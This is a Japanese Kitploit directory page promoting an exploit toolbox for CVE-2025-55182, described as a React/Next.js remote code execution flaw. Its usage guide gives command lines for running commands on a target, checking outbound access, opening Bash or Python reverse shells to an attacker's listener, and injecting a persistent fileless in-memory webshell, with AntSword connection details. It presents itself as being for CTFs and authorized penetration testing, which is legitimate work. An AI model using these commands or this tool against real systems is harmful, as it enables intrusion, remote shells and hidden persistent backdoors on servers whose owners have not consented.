Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-Toolbox — CVE-2025-55182 (React/Next.js RCE) 用の自動化エクスプロイトツール。コマンド実行、外部検出、対話型リバースシェル、永続的なメモリウェブシェルインジェクションを備え、許可された侵入テストと CTF チャレンジに対応します。 | Kitploit
ツール/GitHubGitHub/lamaper/cve-2025-55182-toolbox
永続化メカニズムエクスプロイトウェブアプリケーション悪用ポストエクスプロイトCTFペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

CVE-2025-55182 (React/Next.js RCE) 用の自動化エクスプロイトツール。コマンド実行、外部検出、対話型リバースシェル、永続的なメモリウェブシェルインジェクションを備え、許可された侵入テストと CTF チャレンジに対応します。

148ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
リポジトリを見る
共有

React2Shell: CVE-2025-55182 総合エクスプロイトツール

Author: lamaper / BITs2Sys

Version: 1.0.1

License: MIT

📝 ツール紹介

本ツールは、CVE-2025-55182(React Server Components / Next.js のプロトタイプ汚染による RCE)に特化した自動ペネトレーションテストツールです。CTF 大会および正規に許可されたセキュリティサービスプロジェクト向けに設計されており、脆弱性検証、外部接続の検出、リバースシェル、メモリ常駐型ウェブシェルの注入などの複数の機能を統合しています。

🚀 コア機能

  • ワンクリックコマンド実行 (--cmd):NEXT_REDIRECT の例外メカニズムを利用し、Base64 エンコードされたコマンド実行結果を正確に返送します。
  • 外部接続状態の検出 (--check-outbound):ターゲットマシンの DNS、HTTP、ICMP へのアクセス可否を自動テストし、攻撃経路の決定を支援します。
  • 対話型リバースシェル (--shell):Bash と Python3 の 2 種類のリバースモードを内蔵し、非同期実行をサポートして HTTP リクエストのハングアップを防ぎます。
  • 永続化メモリ常駐型ウェブシェル (--inject-ms):Node.js の http.Server イベントディスパッチメカニズムをハイジャックしてメモリ常駐型ウェブシェルを注入します。ファイルを残さず、永続的な制御をサポートします。
  • メモリ常駐型ウェブシェル対話インターフェース (--ms-cmd):脆弱性のトリガーパスから独立した対話モードで、注入成功後はバックドア経由で直接コマンドを実行できます。

🛠️ インストールと依存関係

本ツールは Python 3 で開発されており、requests ライブラリのインストールのみが必要です。

root@kitploit:~
pip install requests

📖 使用ガイド

0.脆弱性の有無を検出

https://github.com/assetnote/react2shell-scanner は非常に使いやすい検出ツールです

1. 基本的なコマンド実行

ターゲットマシンの情報を直接取得します:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. 外部接続の検出

リバースシェルを試みる前に、ターゲットマシンが外部ネットワークに接続できるかどうかを確認します:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. リバースシェル

Bash モード:

root@kitploit:~
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444

Python モード:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444

4. メモリ常駐型ウェブシェルの利用 (永続化)

メモリ常駐型ウェブシェルの注入:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

メモリ常駐型ウェブシェル経由でコマンドを実行(注入成功後に使用):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

注:メモリ常駐型ウェブシェルのデフォルトのマウントパスは /?pass で、POST で pwd パラメータを送信することでトリガーされます。

中国蚁剑(AntSword)での接続:

接続パスワード:pwd、接続方式:CMDLINUX

⚠️ 免責事項

本ツールは、法律で許可された範囲内 でのセキュリティ研究、CTF 大会、および正規に許可されたペネトレーションテスト専用です。不正な攻撃への使用は固く禁止されています。本ツールの使用により生じる一切の結果は利用者自身が負担するものとします。


ツールをダウンロード